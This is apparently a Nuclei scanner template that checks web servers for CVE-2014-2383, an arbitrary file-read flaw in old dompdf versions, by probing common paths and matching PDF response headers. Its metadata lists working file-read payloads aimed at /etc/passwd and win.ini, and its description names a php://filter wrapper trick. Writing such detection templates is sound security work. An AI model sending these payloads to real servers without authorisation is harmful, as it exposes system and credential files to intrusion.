id: CVE-2014-2383

info:
  name: Arbitrary file read in dompdf < v0.6.0
  author: 0x_Akoko
  severity: high
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2014-2383
    - https://www.exploit-db.com/exploits/33004
  classification:
    cve-id: CVE-2014-2383
  tags: cve,cve2014,dompdf,lfi
  metadata:
    win-payload: "/dompdf.php?input_file=C:/windows/win.ini"
    unix-payload: "/dompdf.php?input_file=/etc/passwd"
  description: "A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter."

requests:
  - method: GET
    path:
      - "{{BaseURL}}/dompdf.php?input_file=dompdf.php"
      - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php"
      - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php"
      - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "application/pdf"
          - 'filename="dompdf_out.pdf"'
        part: header
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/02/24